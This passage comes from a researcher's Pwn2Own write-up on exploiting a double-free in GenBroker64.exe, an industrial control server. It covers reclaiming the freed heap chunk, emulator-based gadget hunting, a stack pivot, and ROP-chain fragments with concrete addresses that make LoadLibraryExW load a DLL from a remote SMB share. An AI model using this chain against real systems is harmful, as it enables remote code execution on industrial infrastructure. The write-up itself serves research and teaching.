
LPPERSISTSTREAM pPersistStream = NULL;

CArchiveStream stm(&ar);

// ...

// [1]

SCODE sc = CoCreateInstance(clsid, NULL,

CLSCTX_ALL | CLSCTX_REMOTE_SERVER,

pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,

(void**)&pSrc->punkVal);

// ...

TRY {

sc = pSrc->punkVal->QueryInterface(

IID_IPersistStream, (void**)&pPersistStream);

// ...

AfxCheckError(pPersistStream->Load(&stm));

} CATCH_ALL(e) {

// [2]

if(pPersistStream != NULL) {

pPersistStream->Release();

}

pSrc->punkVal->Release();

THROW_LAST();

}

The subtlety, though, is that the pointer to the instantiated COM object has been written into pSrc ([1]). pSrc is a reference to a VARIANT object that the caller passed. This is an important detail because Utils::ReadVariant will also catch any exceptions, and will clear Variant:

void Utils::ReadVariant(tagVARIANT *Variant, Archive_t *Archive, int Level) {

TRY {

return ReadVariant_((CArchive *)Archive, (COleVariant *)Variant);

} CATCH_ALL(e) {

VariantClear(Variant);

}

}









Because Variant has been modified by operator>>, VariantClear sees that the variant is holding a COM instance, and so it needs to free it which leads to a double free... 🔥 Unfortunately, IDA (still?) doesn't have good support for exception handling in the Hex-Rays decompiler which makes it hard to see that logic.
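To make the sequence of events concrete, here is a minimal toy model of the double release in Python. It is only a sketch: the class and function names (`ToyComObject`, `ToyVariant`, `toy_operator_shr`, `toy_read_variant`) are made up for illustration, and it only models the `punkVal` reference, not the real MFC or OLEAUT32 code.

```python
class ToyComObject:
    """Reference-counted stand-in for a COM object (illustrative only)."""

    def __init__(self):
        self.refcount = 1            # one reference handed back at creation
        self.freed = False
        self.use_after_free = False

    def release(self):
        if self.freed:
            # The real code would be making a virtual call through freed memory.
            self.use_after_free = True
            return
        self.refcount -= 1
        if self.refcount == 0:
            self.freed = True


class ToyVariant:
    def __init__(self):
        self.vt = "VT_EMPTY"
        self.punk = None


def toy_operator_shr(variant):
    """Mimics operator>>: write the pointer first, release it on failure."""
    variant.vt = "VT_UNKNOWN"
    variant.punk = ToyComObject()    # [1] pointer stored in the caller's VARIANT
    try:
        raise RuntimeError("Load() failed")
    except RuntimeError:
        variant.punk.release()       # [2] first release, pointer left dangling
        raise


def toy_read_variant(variant):
    """Mimics Utils::ReadVariant: clear the VARIANT on any exception."""
    try:
        toy_operator_shr(variant)
    except RuntimeError:
        if variant.vt == "VT_UNKNOWN" and variant.punk is not None:
            variant.punk.release()   # second release on the same object


v = ToyVariant()
toy_read_variant(v)
print(v.punk.freed, v.punk.use_after_free)
```

In this model, the second `release()` is the moment where the real process dereferences the (possibly reclaimed) chunk.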

This bug is interesting. I feel like the MFC operator>> could protect callers from bugs like this by NULL'ing out pSrc->punkVal after releasing it, and updating the variant type to VT_EMPTY. Or, modify pSrc only when the function is about to return a success, but not before. Otherwise it is hard for the exception handler of Utils::ReadVariant even to know if Variant needs to be cleared or not. But who knows, there might be legit reasons as to why the operator works this way 🤷🏽♂️ Regardless, I wouldn't be surprised if bugs like this exist in other applications 🤔. Check out paracosme-poc.py if you would like to trigger this behavior.

The planets were slowly aligning, and I was still in the game. There should be enough time to build an exploit based on what I know. Before digging into the exploit engineering, let's do a recap:



- GenBroker64.exe listens on TCP:38080 and deserializes messages sent by the client

- Although it tries to allow only certain VARIANT types, there is a bug. If the user sends a VT_EMPTY VARIANT, the MFC operator>> is called which will read a VARIANT off the stream. GenBroker64.exe doesn't rewind the stream so the MFC reads another VARIANT type that doesn't go through the allow list. This makes it possible to bypass the allow list and have the MFC instantiate an arbitrary COM object.

- If the COM object throws an exception while either the QueryInterface or Load method is called, the instantiated COM object will be double-free'd. The second free is done by VariantClear, which internally calls the object's virtual Release method.

If we can reclaim the freed memory after the first free but before VariantClear, then we control a vtable pointer, and as a result hijack control flow 💥.

Let's now work on engineering planet alignments 💫.

Can I reclaim the chunk with controlled data?

I had a lot of questions but the important ones were:

- Can I run multiple clients at the same time, and if so, can I use them to reclaim the memory chunk?

- Is there any behavior in the heap allocator that prevents another thread from reclaiming the chunk?

- Assuming I can reclaim it, can I fill it with controlled data?



To answer the first two questions, I ran GenBroker64.exe under a debugger to verify that I could execute other clients while the target thread was frozen. While doing that, I also confirmed that the freed chunk can be reclaimed by another client when the target thread is frozen right after the first free.

The third question was a lot more work though. I first looked into leveraging another COM object that allowed me to fill the reclaimed chunk with arbitrary content via the Load method. I modified the tooling I wrote to enumerate and find suitable candidates, but I eventually walked away. Many COM objects used a different allocator or were allocating off a different heap, and I never really found one that allowed me to control as much as I wanted off the reclaimed chunk.





I moved on, and started to look at using a different message to both reclaim and fill the chunk with controlled content. The message with the id 0x7d0 exactly fits the bill: it allows for an allocation of an arbitrary size and lets the client fully control its content which is perfect 👌🏽. The function that deserializes this message allocates and fills up an array of arbitrary size made of 32-bit integers, and this is what it looks like:

void __fastcall PayloadReq7D0_t::ReadFromArchive(PayloadReq7D0_t *Payload, Archive_t *Archive) {

// ...

if ( (Archive->m_nMode & ArchiveReadMode) != 0 )

{

Archive::ReadString((CArchive *)Archive, (CString *)Payload);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->ProgId);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringC);

Archive::ReadUint32_(Archive, &Payload->qword18);

Archive::ReadUint32_(Archive, &Payload->BufferSize);

BufferSize = Payload->BufferSize;

if ( BufferSize )

{

Buffer = calloc(BufferSize, 4ui64);

Payload->Buffer = Buffer;

if ( Buffer )

{

for ( i = 0i64; (unsigned int)i < Payload->BufferSize; Archive->m_lpBufCur += 4 )

{

Entry = &Payload->Buffer[i];

// ...

*Entry = *(_DWORD *)m_lpBufCur;

}

// ...
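Since the server does `calloc(BufferSize, 4)` and then copies `BufferSize` 32-bit values, the content we want in the reclaimed chunk has to be expressed as a list of DWORDs. The sketch below shows that conversion, assuming the target chunk is 0xc0 bytes (the size of the freed object mentioned later in the article). The helper name `chunk_to_dwords` is hypothetical, and the rest of the 0x7d0 message (the three strings and the other fields) is deliberately not modeled here.

```python
import struct

CHUNK_SIZE = 0xC0  # size of the freed object according to the article


def chunk_to_dwords(chunk):
    """Split raw chunk bytes into the little-endian 32-bit values the server copies."""
    if len(chunk) % 4 != 0:
        raise ValueError("chunk length must be a multiple of 4")
    count = len(chunk) // 4
    return list(struct.unpack("<%dI" % count, chunk))


# Example content: one recognizable qword followed by zero padding.
chunk = struct.pack("<Q", 0x4141414141414141).ljust(CHUNK_SIZE, b"\x00")
dwords = chunk_to_dwords(chunk)

# BufferSize is the number of entries, so calloc(BufferSize, 4) == CHUNK_SIZE.
buffer_size = len(dwords)
print(hex(buffer_size * 4))
```

With a 0xc0-byte chunk this gives 48 entries, so that `calloc(48, 4)` asks the allocator for the same size as the freed object.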

Hijacking control flow & ROPing to get arbitrary native code execution































































Once I identified the right memory primitives, hijacking control flow was pretty straightforward. As I mentioned above, VariantClear reads the first 8 bytes of the object as a virtual table pointer. Then, it reads off this virtual table at a specific offset and dispatches an indirect call. This is the assembly code with @rcx pointing to the variant that we reclaimed and filled with arbitrary content:

0:011> u . l3

OLEAUT32!VariantClear+0x20b:

00007ffb`0df751cb mov rax,qword ptr [rcx]

00007ffb`0df751ce mov rax,qword ptr [rax+10h]

00007ffb`0df751d2 call qword ptr [00007ffb`0df82660]

0:011> u poi(00007ffb`0df82660)

OLEAUT32!SetErrorInfo+0xec0:

00007ffb`0deffd40 jmp rax

The first instruction reads the virtual table address into @rax, then the Release virtual method address is read at offset 0x10 from the table, and finally, Release is called via an indirect call. Imagine that the below is the content of the reclaimed variant object:

0x11111111'11111111

0x22222222'22222222

0x33333333'33333333



Execution will be redirected to [[0x11111111'11111111] + 0x10] which means:

0x11111111'11111111needs to be an address that points somewhere readable in the address space to not crash,- At the same time, it needs to be pointing to another address (to which is added the offset



0x10) that will point to where we want to pivot execution.
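The double dereference is easier to reason about with a toy model. The sketch below treats memory as a Python dictionary mapping addresses to qwords; the function name `resolve_constrained_call` and the example addresses are made up for illustration.

```python
def resolve_constrained_call(memory, chunk_addr):
    """Return the address execution lands on, following the two loads.

    `memory` is a toy address -> qword mapping. A missing key stands in
    for an unreadable address (an access violation in the real process).
    """
    vtable = memory[chunk_addr]      # mov rax, qword ptr [rcx]
    target = memory[vtable + 0x10]   # mov rax, qword ptr [rax+10h]
    return target                    # jmp rax


# The chunk's first qword must point at readable memory (0x2000 here),
# and the qword at that address + 0x10 decides where we end up.
toy_memory = {0x1000: 0x2000, 0x2010: 0x3000}
print(hex(resolve_constrained_call(toy_memory, 0x1000)))

# If the first qword points nowhere, the lookup fails, like the crash would.
try:
    resolve_constrained_call({0x1000: 0x1111111111111111}, 0x1000)
except KeyError:
    print("unreadable vtable address")
```

This is why the primitive is called constrained: we do not pick the destination directly, we pick an address whose content at +0x10 is the destination.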













I was like, ugh, this constrained call primitive is a bit annoying 😒. Another crucial piece that we haven't brought up yet is... ASLR. Fortunately for us, the main module GenBroker64.exe isn't randomized, although the rest of the address space is. Technically this is not quite true because GenClient64.dll wasn't randomized either, but I quickly ditched it as it was tiny and uninteresting. Our only option is to use gadgets from GenBroker64.exe because we do not have a way to leak information about the target's address space. On top of that, the use-after-free'd object is 0xc0 bytes long, which doesn't give us a lot of room for a ROP chain (at best 0xc0 / 8 = 24 slots).

All those constraints felt overwhelming at first, so I decided to address them one by one. What do we need from our ROP chain? The ROP chain needs to demonstrate arbitrary code execution, which is commonly done by popping a shell. Because of ASLR, we don't know where CreateProcess or similar are in memory. We are stuck with reusing functions imported by GenBroker64.exe. This is possible because we know where its Import Address Table is, and we know API addresses are populated in this table by the PE loader when the process is created. Unfortunately, GenBroker64.exe doesn't import anything super exciting:

The only obvious import that stands out was LoadLibraryExW. It allows loading a DLL hosted on a remote share. This is cool, but it also means we need to burn space in the reclaimed heap chunk just to store a UTF-16 string that looks like the following: \\192.168.1.1\x\a.dll\x00. This is already ~44 bytes 😓.
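The ~44 bytes figure can be checked quickly. The sketch below encodes the example path as UTF-16 with its terminator and works out how many 8-byte slots of a 0xc0-byte chunk it would consume; the variable names are mine.

```python
CHUNK_SIZE = 0xC0
SLOT_SIZE = 8

# The example UNC path from the article, plus the wide NUL terminator.
path = "\\\\192.168.1.1\\x\\a.dll"
encoded = (path + "\x00").encode("utf-16-le")

total_slots = CHUNK_SIZE // SLOT_SIZE
slots_used = (len(encoded) + SLOT_SIZE - 1) // SLOT_SIZE  # round up
slots_left = total_slots - slots_used

print(len(encoded), slots_used, slots_left)
```

Every extra character in the IP address or the share name costs two more bytes, which is why a short path matters here.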





How the hell do we boost the constrained call primitive into an arbitrary call primitive 🤔? Based on the constraints, looking for that magic gadget was painful and a bit of a walk in the desert. I started doing it manually and focusing on virtual tables because in essence.. we need a very specific one. On top of being well formed, the function pointer at offset 0x10 needs to be pointing to a piece of code that is useful for us. After hours and hours of prototyping, searching, and trying ideas, I lost hope. It was so weird because it felt like I was so close but so far away at the same time 😢.



I switched gears and decided to write a brute-force tool. The idea was to capture a crash dump when I hijack control flow, load it into an emulator, and replace the virtual table pointer with EVERY addressable part of GenBroker64.exe. The emulator executes forward and catches crashes. When one occurs, I can check postconditions such as 'Does RIP have a value that looks like a controlled value'? I initially wrote this as a quick & dirty script but recently rewrote it in Rust as a learning exercise 🦀. I'll try to clean it up and release it if people are interested. The pre function runs before the emulator starts executing; it inserts the candidate address right where the vtable pointer is expected, to simulate our exploit:

impl Finder for Pwn2OwnMiami2022_1 {

fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {

// ```

// (1574.be0): Access violation - code c0000005 (first/second chance not available)

// For analysis of this file, run !analyze -v

// oleaut32!VariantClearWorker+0xff:

// 00007ffb`3a3dc7fb 488b4010 mov rax,qword ptr [rax+10h] ds:deadbeef`baadc0ee=????????????????

//

// 0:011> u . l3

// oleaut32!VariantClearWorker+0xff:

// 00007ffb`3a3dc7fb 488b4010 mov rax,qword ptr [rax+10h]

// 00007ffb`3a3dc7ff ff15c3ce0000 call qword ptr [oleaut32!_guard_dispatch_icall_fptr (00007ffb`3a3e96c8)]

//

// 0:011> u poi(00007ffb`3a3e96c8)

// oleaut32!guard_dispatch_icall_nop:

// 00007ffb`3a36e280 ffe0 jmp rax

// ```

let rcx = emu.rcx();

// Rewind to the instruction right before the crash:

// ```

// 0:011> ub .

// oleaut32!VariantClearWorker+0xe6:

// ...

// 00007ffb`3a3dc7f8 488b01 mov rax,qword ptr [rcx]

// ```

emu.set_rip(0x00007ffb_3a3dc7f8);

// Overwrite the buffer we control with the `MARKER_PAGE_ADDR`. The first qword

// is used to hijack control flow, so this is where we write the candidate

// address.

for qword in 0..18 {

let idx = qword * std::mem::size_of::<u64>();

let idx = idx as u64;

let value = if qword == 0 {

candidate

} else {

MARKER_PAGE_ADDR.u64()

};

emu.virt_write(Gva::new(rcx + idx), &value)?;

}

Ok(())

}

fn post(&mut self, emu: &Emu) -> Result<bool> {

// ...

}

}

The post function runs after the emulator halted (because of a crash or a timeout). The below tries to identify a tainted RIP:

impl Finder for Pwn2OwnMiami2022_1 {

fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {

// ...

}

fn post(&mut self, emu: &Emu) -> Result<bool> {

// What we want here, is to find a sequence of instructions that leads to @rip

// being controlled. To do that, in the |Pre| callback, we populate the buffer

// we control with the `MARKER_PAGE_ADDR`, which is a magic address

// that'll trigger a fault if it's accessed/written to / executed. Basically,

// we want to force a crash as this might mean that we successfully found a

// gadget that'll allow us to turn the constrained arbitrary call from above

// into an unconstrained one where we don't need to worry about dereferences

// (cf |mov rax, qword ptr [rax+10h]|).

//

// Here is the gadget I ended up using:

// ```

// 0:011> u poi(1400aed18)

// 00007ffb2137ffe0 sub rsp,38h

// 00007ffb2137ffe4 test rcx,rcx

// 00007ffb2137ffe7 je 00007ffb`21380015

// 00007ffb2137ffe9 cmp qword ptr [rcx+10h],0

// 00007ffb2137ffee jne 00007ffb`2137fff4

// ...

// 00007ffb2137fff4 and qword ptr [rsp+40h],0

// 00007ffb2137fffa mov rax,qword ptr [rcx+10h]

// 00007ffb2137fffe call qword ptr [mfc140u!__guard_dispatch_icall_fptr (00007ffb`21415b60)]

// ```

let mask = 0xffffffff_ffff0000u64;

let marker = MARKER_PAGE_ADDR.u64();

let rip_has_marker = (emu.rip() & mask) == (marker & mask);

Ok(rip_has_marker)

}

}
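The postcondition boils down to a masked comparison. Here is the same check as a small Python sketch; the marker value below is a made-up placeholder, since the real `MARKER_PAGE_ADDR` isn't given in the article.

```python
MASK = 0xFFFFFFFF_FFFF0000

# Hypothetical marker address, for illustration only.
HYPOTHETICAL_MARKER = 0x0000_1337_0000_0000


def rip_has_marker(rip, marker=HYPOTHETICAL_MARKER):
    """True when RIP matches the marker once the low 16 bits are ignored."""
    return (rip & MASK) == (marker & MASK)


print(rip_has_marker(HYPOTHETICAL_MARKER))            # exact hit
print(rip_has_marker(HYPOTHETICAL_MARKER + 0x0ABC))   # small offset still counts
print(rip_has_marker(HYPOTHETICAL_MARKER + 0x10000))  # outside the 64KB window
```

Ignoring the low 16 bits means a candidate still counts when RIP ends up slightly offset from the marker value, as long as it stays in the same 64KB window.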



I went for lunch to take a break and let the bruteforce run while I was out. I came back and started to see exciting results 😮:





Although it took multiple iterations to tighten the postconditions to eliminate false positives, I eventually found glorious 0x1400aed08. Let's run through what glorious 0x1400aed08 does. Small reminder, this is the code we hijack control-flow from:

00007ffb`0df751cb mov rax,qword ptr [rcx]

00007ffb`0df751ce mov rax,qword ptr [rax+10h]

00007ffb`0df751d2 call qword ptr [00007ffb`0df82660] ; points to jmp @rax

Okay, the first instruction reads the first QWORD in the heap chunk which we'll set to 0x1400aed08. The second instruction reads the QWORD at 0x1400aed08+0x10, which holds the address of mfc140u!CRuntimeClass::CreateObject:

0:011> dqs 0x1400aed08+10

00000001`400aed18 00007ffb`2137ffe0 mfc140u!CRuntimeClass::CreateObject [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\objcore.cpp @ 127]

Execution is transferred to 0x7ffb2137ffe0 / mfc140u!CRuntimeClass::CreateObject, which does the following:

0:011> u 00007ffb2137ffe0

00007ffb2137ffe0 sub rsp,38h

00007ffb2137ffe4 test rcx,rcx

00007ffb2137ffe7 je 00007ffb`21380015 ; @rcx is never going to be zero, so we won't take this jump

00007ffb2137ffe9 cmp qword ptr [rcx+10h],0 ; @rcx+0x10 is populated with data from our future ROP chain

00007ffb2137ffee jne 00007ffb`2137fff4 ; so it will never be zero meaning we'll take this jump always

...

00007ffb2137fff4 and qword ptr [rsp+40h],0

00007ffb2137fffa mov rax,qword ptr [rcx+10h]

00007ffb2137fffe call qword ptr [mfc140u!__guard_dispatch_icall_fptr (00007ffb`21415b60)]

0:011> u poi(00007ffb`21415b60)

mfc140u!_guard_dispatch_icall_nop [D:\a01\_work\6\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asm @ 53]:

00007ffb`21407190 ffe0 jmp rax

Okay, so this is .. amazing ✊🏽. It reads at offset 0x10 off our chunk, and assuming it isn't zero it will redirect execution there. If we set-up the reclaimed chunk to have the first QWORD be 0x1400aed08, and the one at offset 0x10 to 0xdeadbeefbaadc0de, then execution is redirected to 0xdeadbeefbaadc0de. This precisely boosts the constrained call primitive into an arbitrary call primitive. This is solid progress, and it filled me with hope.
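To summarize the chunk layout this requires, here is a small sketch that builds a 0xc0-byte buffer with the two interesting qwords in place and replays the logic of the two dispatches. The helper names (`build_chunk`, `simulated_rip`) are hypothetical, and the simulation only encodes the behavior described above; it does not emulate the real code.

```python
import struct

CHUNK_SIZE = 0xC0
GADGET_TABLE = 0x1400AED08  # address inside GenBroker64.exe from the article


def build_chunk(target):
    """Lay out the reclaimed chunk: fake vtable pointer at +0x00, target at +0x10."""
    chunk = bytearray(CHUNK_SIZE)
    struct.pack_into("<Q", chunk, 0x00, GADGET_TABLE)
    struct.pack_into("<Q", chunk, 0x10, target)
    return bytes(chunk)


def simulated_rip(chunk):
    """Replay both dispatches on the chunk and return where execution ends up."""
    (vtable,) = struct.unpack_from("<Q", chunk, 0x00)
    if vtable != GADGET_TABLE:
        raise ValueError("first qword does not point at the expected table")
    # [vtable + 0x10] is CRuntimeClass::CreateObject, which then jumps to
    # whatever non-zero value sits at offset 0x10 of the object in @rcx.
    (target,) = struct.unpack_from("<Q", chunk, 0x10)
    if target == 0:
        raise ValueError("CreateObject would take the other branch")
    return target


chunk = build_chunk(0xDEADBEEFBAADC0DE)
print(hex(simulated_rip(chunk)))
```

The qword at offset 0x08 is left untouched by both stages, which matches the `bbbbbbbb`bbbbbbbb` filler visible in the later crash dump.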

With an arbitrary call primitive in hand, we need to find a way to kick-start a ROP chain. Usually, the easiest way to do that is to pivot the stack to an area you control. Chaining the gadgets is then as easy as returning to the next one in line. Unfortunately, finding this pivot was also pretty annoying. GenBroker64.exe is fairly small in size and doesn't offer many super valuable gadgets. Another wall.



I decided to try to find the pivot gadget with my tool. Like in the previous example, I injected the candidate address at the right place, looked for a stack pivoted inside the heap chunk we have control over, and a tainted RIP:

impl Finder for Pwn2OwnMiami2022_2 {

fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {

// Here, we continue where we left off after the gadget found in |miami1|,

// where we went from constrained arbitrary call, to unconstrained arbitrary

// call. At this point, we want to pivot the stack to our heap chunk.

//

// ```

// (1de8.1f6c): Access violation - code c0000005 (first/second chance not available)

// For analysis of this file, run !analyze -v

// mfc140u!_guard_dispatch_icall_nop:

// 00007ffd`57427190 ffe0 jmp rax {deadbeef`baadc0de}

//

// 0:011> dqs @rcx

// 00000000`1970bf00 00000001`400aed08 GenBroker64+0xaed08

// 00000000`1970bf08 bbbbbbbb`bbbbbbbb

// 00000000`1970bf10 deadbeef`baadc0de <-- this is where @rax comes from

// 00000000`1970bf18 61616161`61616161

// ```

self.rcx_before = emu.rcx();

// Fix up @rax with the candidate's address.

emu.set_rax(candidate);

// Fix up the buffer, where the address of the candidate would be if we were

// executing it after |miami1|.

let size_of_u64 = std::mem::size_of::<u64>() as u64;

let third_qword = size_of_u64 * 2;

emu.virt_write(Gva::from(self.rcx_before + third_qword), &candidate)?;

// Overwrite the buffer we control with the `MARKER_PAGE_ADDR`. Skip the first 3

// qwords, because the first and third ones are already used to hijack flow

// and the second we skip it as it makes things easier.

for qword_idx in 3..18 {

let byte_idx = qword_idx * size_of_u64;

emu.virt_write(

Gva::from(self.rcx_before + byte_idx),

&MARKER_PAGE_ADDR.u64(),

)?;

}

Ok(())

}

fn post(&mut self, emu: &Emu) -> Result<bool> {

// Let's check if we pivoted into our buffer AND that we also are able to

// start a ROP chain.

let wanted_landing_start = self.rcx_before + 0x18;

let wanted_landing_end = self.rcx_before + 0x90;

let pivoted = has_stack_pivoted_in_range(emu, wanted_landing_start..=wanted_landing_end);

let mask = 0xffffffff_ffff0000;

let rip = emu.rip();

let rip_has_marker = (rip & mask) == (MARKER_PAGE_ADDR.u64() & mask);

let is_interesting = pivoted && rip_has_marker;

Ok(is_interesting)

}

}



After running it for a while, 0x14005bd25 appeared:

Let's run through what happens when execution is redirected to 0x14005bd25:

0:011> u 0x14005bd25 l3

GenBroker64+0x5bd25:

00000001`4005bd25 8be1 mov esp,ecx

00000001`4005bd27 803d5a2a0a0000 cmp byte ptr [GenBroker64+0xfe788 (00000001`400fe788)],0

00000001`4005bd2e 0f8488010000 je GenBroker64+0x5bebc (00000001`4005bebc)

0:011> db 00000001`400fe788 l1

00000001`400fe788 00 .

0:011> u 00000001`4005bebc l0n11

GenBroker64+0x5bebc:

00000001`4005bebc 4c8d5c2460 lea r11,[rsp+60h]

00000001`4005bec1 498b5b30 mov rbx,qword ptr [r11+30h]

00000001`4005bec5 498b6b38 mov rbp,qword ptr [r11+38h]

00000001`4005bec9 498b7340 mov rsi,qword ptr [r11+40h]

00000001`4005becd 498be3 mov rsp,r11

00000001`4005bed0 415f pop r15

00000001`4005bed2 415e pop r14

00000001`4005bed4 415d pop r13

00000001`4005bed6 415c pop r12

00000001`4005bed8 5f pop rdi

00000001`4005bed9 c3 ret

This one is interesting. The first instruction effectively pivots the stack to the heap chunk under our control. What is weird about it is that it uses the 32-bit registers esp & ecx and not rsp & rcx. If either the stack or our heap buffer addresses were to be allocated inside a region above 0xffff'ffff, things would go wrong (because of truncation).

0:011> r @rsp

rsp=000000001961acd8

0:011> r @rcx

rcx=000000001970bf00

There's no way both of those addresses are always allocated under 0xffff'ffff I thought. I must have gotten lucky when I captured the crash-dump. But after running it multiple times it seemed like both the heap and the stack addresses fit into a 32-bit register. This was unexpected, and I don't know why the kernel always seems to lay out those regions in the lower part of the virtual address space. Regardless, I was happy about it 😅
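The truncation concern can be expressed in a couple of lines. A write to a 32-bit register on x64 zero-extends into the full 64-bit register, so `mov esp, ecx` leaves @rsp equal to the low 32 bits of @rcx. The sketch below (function names are mine) checks whether a given chunk address survives that.

```python
def rsp_after_mov_esp_ecx(rcx):
    """Model `mov esp, ecx`: the upper 32 bits of rsp end up zeroed."""
    return rcx & 0xFFFFFFFF


def pivot_lands_in_chunk(rcx):
    """The pivot only works if the chunk address fits in 32 bits."""
    return rsp_after_mov_esp_ecx(rcx) == rcx


# Chunk address observed in the article's crash dump.
print(pivot_lands_in_chunk(0x000000001970BF00))

# Hypothetical address above 4GB: the pivot would point somewhere else.
print(pivot_lands_in_chunk(0x000000011970BF00))
```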

After pivoting the stack, it reads three values into @rbx, @rbp & @rsi at different offsets from @r11. @r11 is pointing to @rsp+0x60 which is at offset 0x60 from the heap chunk start. This is fine because we have control over 0xc0 bytes, which keeps the offsets 0x90 / 0x98 / 0xa0 in bounds. After that, the stack is pivoted again a little further via the mov rsp, r11 instruction, which moves it 0x60 bytes forward. From there, five pointers are popped off the stack, giving us control over @r15 / @r14 / @r13 / @r12 / @rdi.
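It helps to write down which chunk offset feeds which register. The sketch below walks the gadget's instructions symbolically, using offsets relative to the start of the heap chunk; `pivot_layout` is a hypothetical helper name and the model only covers the instructions listed above.

```python
CHUNK_SIZE = 0xC0


def pivot_layout():
    """Return ({name: chunk offset}, final rsp offset) for the pivot gadget."""
    layout = {}
    rsp = 0x00                    # mov esp, ecx -> stack at chunk start
    r11 = rsp + 0x60              # lea r11, [rsp+60h]
    layout["rbx"] = r11 + 0x30    # mov rbx, [r11+30h]
    layout["rbp"] = r11 + 0x38    # mov rbp, [r11+38h]
    layout["rsi"] = r11 + 0x40    # mov rsi, [r11+40h]
    rsp = r11                     # mov rsp, r11
    for reg in ("r15", "r14", "r13", "r12", "rdi"):
        layout[reg] = rsp         # pop reg
        rsp += 8
    layout["ret"] = rsp           # ret reads the next gadget address here
    rsp += 8
    return layout, rsp


layout, final_rsp = pivot_layout()
for name, offset in sorted(layout.items(), key=lambda item: item[1]):
    print("%-3s <- chunk+0x%02x" % (name, offset))
print("rsp after ret: chunk+0x%02x" % final_rsp)
```

In this model the first gadget address is read from offset 0x88, and the chain continues from offset 0x90, which is also the slot that was loaded into @rbx.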



What's next now 🤔? We made a lot of progress but what we've been doing until now is just setting things up to do useful things. The puzzle pieces are yet to be arranged to call LoadLibraryExW(L"\\\\192.168.0.1\\x\\a.dll\x00", 0, 0). The target is a 64-bit process, so we need to load @rcx with a pointer to the string. Both @rdx & @r8 need to be set to zero. To call LoadLibraryExW, we need to dereference the IAT chunk at 0x1400ae418, and redirect execution there:

0:011> dqs 0x1400ae418 l1

00000001`400ae418 00007ffd`7028e4f0 kernel32!LoadLibraryExWStub

We will put the string in the heap chunk so we just need to find a way to load its address in @rcx. @rcx points to the start of our heap chunk, so we need to add an offset to it. I did this with an add ecx, dword [rbp-0x75] gadget. I load @rbp with an address that points to the value I need to adjust @ecx by. Depending on where our heap chunk is allocated, the add ecx could trigger problems similar to the stack pivot's, but testing showed that the address always landed in the lower 4GB of the address space, making it safe.

# Set @rbp to an address that points to the value 0x30. This is used

# to adjust the @rcx pointer to the remote dll path from above.

# 0x1400022dc: pop rbp ; ret ; (717 found)

pop_rbp_gadget_addr = 0x1400022DC

# > rp-win-x64.exe --file GenBroker64.exe --search-hexa=\x30\x00\x00\x00

# 0x1400a2223: 0\x00\x00\x00

_0x30_ptr_addr = 0x1400A2223

p += p64(pop_rbp_gadget_addr)

p += p64(_0x30_ptr_addr + 0x75)

left -= 8 * 2

# Adjust the @rcx pointer to point to the remote dll path using the

# 0x30 pointer loaded in @rbp from above.

# 0x14000e898: add ecx, dword [rbp-0x75] ; ret ; (1 found)

add_ecx_gadget_addr = 0x14000E898

p += p64(add_ecx_gadget_addr)

left -= 8
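The snippet above relies on a `p64` helper and on the `[rbp-0x75]` addressing of the gadget, so here is a self-contained sketch of that arithmetic. The `p64` definition and the toy `add_ecx` model are my own illustrations (the real exploit may define things differently); the addresses are the ones quoted above.

```python
import struct


def p64(value):
    """Pack a 64-bit little-endian value, as commonly done in exploit scripts."""
    return struct.pack("<Q", value)


def add_ecx(rcx, rbp, memory):
    """Model `add ecx, dword [rbp-0x75]` on a toy address -> dword mapping."""
    addend = memory[rbp - 0x75]
    return (rcx + addend) & 0xFFFFFFFF   # 32-bit result, upper half zeroed


POP_RBP = 0x1400022DC      # pop rbp ; ret
ADD_ECX = 0x14000E898      # add ecx, dword [rbp-0x75] ; ret
PTR_TO_0X30 = 0x1400A2223  # bytes 30 00 00 00 inside GenBroker64.exe

# rbp is biased by +0x75 so that [rbp-0x75] reads the 0x30 constant.
rbp = PTR_TO_0X30 + 0x75
fragment = p64(POP_RBP) + p64(rbp) + p64(ADD_ECX)

toy_memory = {PTR_TO_0X30: 0x30}
new_rcx = add_ecx(0x1970BF00, rbp, toy_memory)
print(len(fragment), hex(new_rcx))
```

With the chunk address from the earlier crash dump, @rcx moves from 0x1970bf00 to 0x1970bf30, i.e. 0x30 bytes into the chunk, at a cost of three 8-byte slots.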

It is convenient to have the stack pivoted into a heap chunk under our control but it is dangerous to call LoadLibraryExW in that state. It will corrupt neighboring chunks, risk accessing unmapped memory, etc. It's bad. Very bad. We don't necessarily need to pivot back the stack where it was before, but we need to pivot it into a reasonably large region of memory in which content stays the same, or at least not often. After several tests, pivoting to GenClient64's data section seemed to work well:

0:011> !dh -a genclient64

SECTION HEADER #3

.data name

6C80 virtual size

12B000 virtual address

C0000040 flags

Read Write

I reused the pop rbp gadget, and used a leave; call qword [@r14+0x08] gadget to both pivot the stack and redirect execution to LoadLibraryExW. It isn't reflected well in this article but finding this gadget was also annoying. The challenge was to be able to pivot the stack and call LoadLibraryExW at the same time. I have no control over GenClient64's data section which means I lose control of the execution flow if I only pivot there. On top of that, I was tight on available space.

Phew, we did it 😮. Putting this ROP chain together was a struggle and was nerve-wracking. But you know, making constant small incremental progress led us to the summit. There were other challenges I ran into that I didn't describe in this article though. One of them was that I first tried to deliver the payload via a WebDAV share instead of SMB. What would happen is that the first time the link was fed to LoadLibraryExW, it would fail, but the second time the payload would pop. I spent time reverse-engineering mrxdav.sys to understand what was different between the first and the second load request, but I can't remember what the reason was. Yeah, I know, super helpful 😬. Another essential property of this vulnerability is that losing the race doesn't lead to a crash. This means the exploit can try as many times as we want.

After weeks of grinding against this target after work, I finally had something that could be demonstrated during the contest. What a crazy ride 🎢.



🎊 Entering the contest

At this point in the journey, it is probably the end of November or mid-December 2021. The contest is happening at the end of January, so timeline-wise, it is looking great. There's time to test the exploit, tweak it to maximize the chances of landing successfully, and develop a payload for style points at the contest and have some fun. I was feeling good and preparing for a vacation trip to France to see my family and take a break.

